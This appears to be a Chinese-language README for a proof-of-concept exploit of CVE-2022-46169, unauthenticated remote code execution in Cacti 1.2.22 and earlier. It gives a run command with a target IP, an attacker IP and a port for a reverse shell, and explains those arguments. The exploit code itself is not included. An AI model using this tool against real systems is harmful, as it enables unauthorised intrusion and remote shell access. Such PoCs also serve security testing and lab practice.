该仓库包含 CVE-2022-46169 的概念验证(PoC)——针对 Cacti <= 1.2.22 的未经身份验证的远程代码执行。你可以在此处阅读有关该漏洞的更多信息。该脚本添加了一个反向 Shell 处理器,并基于 sAsPeCt488 编写的代码。你可以在此处查看原始代码。
python3 CVE-2022-46169.py -t 10.129.211.250 -i 10.10.14.72 -p 4444
参数:
-t : 目标 IP 地址
-i : 攻击者系统 IP 地址
-p : 反向 Shell 端口
